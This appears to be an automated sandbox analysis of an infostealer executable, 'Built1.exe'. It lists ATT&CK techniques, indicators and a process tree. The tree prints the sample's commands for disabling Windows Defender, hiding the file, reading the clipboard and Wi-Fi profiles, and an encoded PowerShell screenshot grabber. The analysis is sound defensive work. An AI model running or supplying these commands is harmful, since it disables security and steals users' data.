4cde070878f0c3ca755db836b206cde36980d508b932274810de0d4daaaa2306

Analysis

max time kernel
139s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-11-2024 18:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built1.exe
Size

7.5MB
MD5

c9e9db948eeeece5252f031b19d0e735
SHA1

3c8df3b2c86fa21d411fbb4095df323ae4c7389e
SHA256

4cde070878f0c3ca755db836b206cde36980d508b932274810de0d4daaaa2306
SHA512

69ffb3c3898b006bf4b2e8e69fac342527242bcae2c5fb29fe702b4603c6493148d47a48f508a9c8a75f68083114bfec618ddc97f4591993284be532cfc6c5ca
SSDEEP

196608:7uQCwVE67urErvI9pWjgN3ZdahF0pbH1AY7WtQsNo/03vC17:PVf7urEUWjqeWx06rYY7

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3656	powershell.exe
4656	powershell.exe
888	powershell.exe
3580	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1652	cmd.exe
2716	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1452	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe
1740	Built1.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
28	discord.com
29	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2204	tasklist.exe
3668	tasklist.exe
3508	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1464	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ce0-21.dat	upx
behavioral2/memory/1740-25-0x00007FF865490000-0x00007FF865B54000-memory.dmp	upx
behavioral2/files/0x0007000000023cd3-27.dat	upx
behavioral2/memory/1740-30-0x00007FF879200000-0x00007FF879225000-memory.dmp	upx
behavioral2/files/0x0007000000023cde-31.dat	upx
behavioral2/memory/1740-48-0x00007FF87E100000-0x00007FF87E10F000-memory.dmp	upx
behavioral2/files/0x0007000000023cda-47.dat	upx
behavioral2/files/0x0007000000023cd9-46.dat	upx
behavioral2/files/0x0007000000023cd8-45.dat	upx
behavioral2/files/0x0007000000023cd7-44.dat	upx
behavioral2/files/0x0007000000023cd6-43.dat	upx
behavioral2/files/0x0007000000023cd5-42.dat	upx
behavioral2/files/0x0007000000023cd4-41.dat	upx
behavioral2/files/0x0007000000023cd2-40.dat	upx
behavioral2/files/0x0007000000023ce5-39.dat	upx
behavioral2/files/0x0007000000023ce4-38.dat	upx
behavioral2/files/0x0007000000023ce3-37.dat	upx
behavioral2/files/0x0007000000023cdf-34.dat	upx
behavioral2/files/0x0007000000023cdd-33.dat	upx
behavioral2/memory/1740-54-0x00007FF874930000-0x00007FF87495D000-memory.dmp	upx
behavioral2/memory/1740-56-0x00007FF879AF0000-0x00007FF879B0A000-memory.dmp	upx
behavioral2/memory/1740-58-0x00007FF874680000-0x00007FF8746A4000-memory.dmp	upx
behavioral2/memory/1740-60-0x00007FF865310000-0x00007FF86548F000-memory.dmp	upx
behavioral2/memory/1740-62-0x00007FF874910000-0x00007FF874929000-memory.dmp	upx
behavioral2/memory/1740-66-0x00007FF8746E0000-0x00007FF874713000-memory.dmp	upx
behavioral2/memory/1740-64-0x00007FF879160000-0x00007FF87916D000-memory.dmp	upx
behavioral2/memory/1740-71-0x00007FF864C10000-0x00007FF864CDD000-memory.dmp	upx
behavioral2/memory/1740-74-0x00007FF879200000-0x00007FF879225000-memory.dmp	upx
behavioral2/memory/1740-73-0x00007FF8646E0000-0x00007FF864C09000-memory.dmp	upx
behavioral2/memory/1740-70-0x00007FF865490000-0x00007FF865B54000-memory.dmp	upx
behavioral2/memory/1740-76-0x00007FF8746C0000-0x00007FF8746D4000-memory.dmp	upx
behavioral2/memory/1740-79-0x00007FF875440000-0x00007FF87544D000-memory.dmp	upx
behavioral2/memory/1740-78-0x00007FF874930000-0x00007FF87495D000-memory.dmp	upx
behavioral2/memory/1740-81-0x00007FF864420000-0x00007FF86453B000-memory.dmp	upx
behavioral2/memory/1740-185-0x00007FF874680000-0x00007FF8746A4000-memory.dmp	upx
behavioral2/memory/1740-225-0x00007FF865310000-0x00007FF86548F000-memory.dmp	upx
behavioral2/memory/1740-308-0x00007FF8746E0000-0x00007FF874713000-memory.dmp	upx
behavioral2/memory/1740-329-0x00007FF864C10000-0x00007FF864CDD000-memory.dmp	upx
behavioral2/memory/1740-331-0x00007FF8646E0000-0x00007FF864C09000-memory.dmp	upx
behavioral2/memory/1740-332-0x00007FF865490000-0x00007FF865B54000-memory.dmp	upx
behavioral2/memory/1740-338-0x00007FF865310000-0x00007FF86548F000-memory.dmp	upx
behavioral2/memory/1740-347-0x00007FF8746C0000-0x00007FF8746D4000-memory.dmp	upx
behavioral2/memory/1740-333-0x00007FF879200000-0x00007FF879225000-memory.dmp	upx
behavioral2/memory/1740-348-0x00007FF865490000-0x00007FF865B54000-memory.dmp	upx
behavioral2/memory/1740-369-0x00007FF865310000-0x00007FF86548F000-memory.dmp	upx
behavioral2/memory/1740-372-0x00007FF8746E0000-0x00007FF874713000-memory.dmp	upx
behavioral2/memory/1740-371-0x00007FF879160000-0x00007FF87916D000-memory.dmp	upx
behavioral2/memory/1740-370-0x00007FF874910000-0x00007FF874929000-memory.dmp	upx
behavioral2/memory/1740-368-0x00007FF874680000-0x00007FF8746A4000-memory.dmp	upx
behavioral2/memory/1740-367-0x00007FF879AF0000-0x00007FF879B0A000-memory.dmp	upx
behavioral2/memory/1740-366-0x00007FF874930000-0x00007FF87495D000-memory.dmp	upx
behavioral2/memory/1740-365-0x00007FF87E100000-0x00007FF87E10F000-memory.dmp	upx
behavioral2/memory/1740-364-0x00007FF879200000-0x00007FF879225000-memory.dmp	upx
behavioral2/memory/1740-363-0x00007FF8646E0000-0x00007FF864C09000-memory.dmp	upx
behavioral2/memory/1740-362-0x00007FF864420000-0x00007FF86453B000-memory.dmp	upx
behavioral2/memory/1740-361-0x00007FF875440000-0x00007FF87544D000-memory.dmp	upx
behavioral2/memory/1740-360-0x00007FF8746C0000-0x00007FF8746D4000-memory.dmp	upx
behavioral2/memory/1740-358-0x00007FF864C10000-0x00007FF864CDD000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4496	cmd.exe
3480	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
888	cmd.exe
3912	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5112	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2744	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3480	PING.EXE

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
4656	powershell.exe
4656	powershell.exe
3656	powershell.exe
3656	powershell.exe
3656	powershell.exe
2716	powershell.exe
2716	powershell.exe
4656	powershell.exe
4656	powershell.exe
4324	powershell.exe
4324	powershell.exe
2716	powershell.exe
4324	powershell.exe
888	powershell.exe
888	powershell.exe
4140	powershell.exe
4140	powershell.exe
3580	powershell.exe
3580	powershell.exe
2264	powershell.exe
2264	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3668	tasklist.exe
Token: SeDebugPrivilege	3508	tasklist.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeIncreaseQuotaPrivilege	764	WMIC.exe
Token: SeSecurityPrivilege	764	WMIC.exe
Token: SeTakeOwnershipPrivilege	764	WMIC.exe
Token: SeLoadDriverPrivilege	764	WMIC.exe
Token: SeSystemProfilePrivilege	764	WMIC.exe
Token: SeSystemtimePrivilege	764	WMIC.exe
Token: SeProfSingleProcessPrivilege	764	WMIC.exe
Token: SeIncBasePriorityPrivilege	764	WMIC.exe
Token: SeCreatePagefilePrivilege	764	WMIC.exe
Token: SeBackupPrivilege	764	WMIC.exe
Token: SeRestorePrivilege	764	WMIC.exe
Token: SeShutdownPrivilege	764	WMIC.exe
Token: SeDebugPrivilege	764	WMIC.exe
Token: SeSystemEnvironmentPrivilege	764	WMIC.exe
Token: SeRemoteShutdownPrivilege	764	WMIC.exe
Token: SeUndockPrivilege	764	WMIC.exe
Token: SeManageVolumePrivilege	764	WMIC.exe
Token: 33	764	WMIC.exe
Token: 34	764	WMIC.exe
Token: 35	764	WMIC.exe
Token: 36	764	WMIC.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	2204	tasklist.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeIncreaseQuotaPrivilege	764	WMIC.exe
Token: SeSecurityPrivilege	764	WMIC.exe
Token: SeTakeOwnershipPrivilege	764	WMIC.exe
Token: SeLoadDriverPrivilege	764	WMIC.exe
Token: SeSystemProfilePrivilege	764	WMIC.exe
Token: SeSystemtimePrivilege	764	WMIC.exe
Token: SeProfSingleProcessPrivilege	764	WMIC.exe
Token: SeIncBasePriorityPrivilege	764	WMIC.exe
Token: SeCreatePagefilePrivilege	764	WMIC.exe
Token: SeBackupPrivilege	764	WMIC.exe
Token: SeRestorePrivilege	764	WMIC.exe
Token: SeShutdownPrivilege	764	WMIC.exe
Token: SeDebugPrivilege	764	WMIC.exe
Token: SeSystemEnvironmentPrivilege	764	WMIC.exe
Token: SeRemoteShutdownPrivilege	764	WMIC.exe
Token: SeUndockPrivilege	764	WMIC.exe
Token: SeManageVolumePrivilege	764	WMIC.exe
Token: 33	764	WMIC.exe
Token: 34	764	WMIC.exe
Token: 35	764	WMIC.exe
Token: 36	764	WMIC.exe
Token: SeDebugPrivilege	888	powershell.exe
Token: SeDebugPrivilege	4140	powershell.exe
Token: SeIncreaseQuotaPrivilege	4048	WMIC.exe
Token: SeSecurityPrivilege	4048	WMIC.exe
Token: SeTakeOwnershipPrivilege	4048	WMIC.exe
Token: SeLoadDriverPrivilege	4048	WMIC.exe
Token: SeSystemProfilePrivilege	4048	WMIC.exe
Token: SeSystemtimePrivilege	4048	WMIC.exe
Token: SeProfSingleProcessPrivilege	4048	WMIC.exe
Token: SeIncBasePriorityPrivilege	4048	WMIC.exe
Token: SeCreatePagefilePrivilege	4048	WMIC.exe
Token: SeBackupPrivilege	4048	WMIC.exe
Token: SeRestorePrivilege	4048	WMIC.exe
Token: SeShutdownPrivilege	4048	WMIC.exe
Token: SeDebugPrivilege	4048	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4748 wrote to memory of 1740	4748	Built1.exe	84
PID 4748 wrote to memory of 1740	4748	Built1.exe	84
PID 1740 wrote to memory of 1320	1740	Built1.exe	88
PID 1740 wrote to memory of 1320	1740	Built1.exe	88
PID 1740 wrote to memory of 3780	1740	Built1.exe	89
PID 1740 wrote to memory of 3780	1740	Built1.exe	89
PID 1740 wrote to memory of 1464	1740	Built1.exe	90
PID 1740 wrote to memory of 1464	1740	Built1.exe	90
PID 1740 wrote to memory of 4556	1740	Built1.exe	94
PID 1740 wrote to memory of 4556	1740	Built1.exe	94
PID 1740 wrote to memory of 4292	1740	Built1.exe	95
PID 1740 wrote to memory of 4292	1740	Built1.exe	95
PID 4556 wrote to memory of 3668	4556	cmd.exe	98
PID 4556 wrote to memory of 3668	4556	cmd.exe	98
PID 4292 wrote to memory of 3508	4292	cmd.exe	99
PID 4292 wrote to memory of 3508	4292	cmd.exe	99
PID 1320 wrote to memory of 3656	1320	cmd.exe	100
PID 1320 wrote to memory of 3656	1320	cmd.exe	100
PID 1464 wrote to memory of 4224	1464	cmd.exe	101
PID 1464 wrote to memory of 4224	1464	cmd.exe	101
PID 1740 wrote to memory of 2460	1740	Built1.exe	102
PID 1740 wrote to memory of 2460	1740	Built1.exe	102
PID 3780 wrote to memory of 4656	3780	cmd.exe	103
PID 3780 wrote to memory of 4656	3780	cmd.exe	103
PID 1740 wrote to memory of 1652	1740	Built1.exe	104
PID 1740 wrote to memory of 1652	1740	Built1.exe	104
PID 1740 wrote to memory of 3716	1740	Built1.exe	108
PID 1740 wrote to memory of 3716	1740	Built1.exe	108
PID 1740 wrote to memory of 816	1740	Built1.exe	109
PID 1740 wrote to memory of 816	1740	Built1.exe	109
PID 1740 wrote to memory of 888	1740	Built1.exe	110
PID 1740 wrote to memory of 888	1740	Built1.exe	110
PID 1740 wrote to memory of 1180	1740	Built1.exe	113
PID 1740 wrote to memory of 1180	1740	Built1.exe	113
PID 1740 wrote to memory of 1828	1740	Built1.exe	116
PID 1740 wrote to memory of 1828	1740	Built1.exe	116
PID 816 wrote to memory of 2368	816	cmd.exe	118
PID 816 wrote to memory of 2368	816	cmd.exe	118
PID 888 wrote to memory of 3912	888	cmd.exe	119
PID 888 wrote to memory of 3912	888	cmd.exe	119
PID 1652 wrote to memory of 2716	1652	cmd.exe	120
PID 1652 wrote to memory of 2716	1652	cmd.exe	120
PID 2460 wrote to memory of 764	2460	cmd.exe	121
PID 2460 wrote to memory of 764	2460	cmd.exe	121
PID 3716 wrote to memory of 2204	3716	cmd.exe	122
PID 3716 wrote to memory of 2204	3716	cmd.exe	122
PID 1180 wrote to memory of 2744	1180	cmd.exe	123
PID 1180 wrote to memory of 2744	1180	cmd.exe	123
PID 1740 wrote to memory of 4964	1740	Built1.exe	124
PID 1740 wrote to memory of 4964	1740	Built1.exe	124
PID 1828 wrote to memory of 4324	1828	cmd.exe	126
PID 1828 wrote to memory of 4324	1828	cmd.exe	126
PID 4964 wrote to memory of 2172	4964	cmd.exe	127
PID 4964 wrote to memory of 2172	4964	cmd.exe	127
PID 1740 wrote to memory of 1780	1740	Built1.exe	128
PID 1740 wrote to memory of 1780	1740	Built1.exe	128
PID 1780 wrote to memory of 2060	1780	cmd.exe	130
PID 1780 wrote to memory of 2060	1780	cmd.exe	130
PID 1740 wrote to memory of 4344	1740	Built1.exe	131
PID 1740 wrote to memory of 4344	1740	Built1.exe	131
PID 4344 wrote to memory of 3236	4344	cmd.exe	133
PID 4344 wrote to memory of 3236	4344	cmd.exe	133
PID 1740 wrote to memory of 3116	1740	Built1.exe	135
PID 1740 wrote to memory of 3116	1740	Built1.exe	135

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4224	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built1.exe
"C:\Users\Admin\AppData\Local\Temp\Built1.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4748
- C:\Users\Admin\AppData\Local\Temp\Built1.exe
  "C:\Users\Admin\AppData\Local\Temp\Built1.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built1.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built1.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built1.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1464
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built1.exe"
      4⤵
      Views/modifies file attributes
      PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4556
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4292
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2460
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3716
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:816
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:888
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1180
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
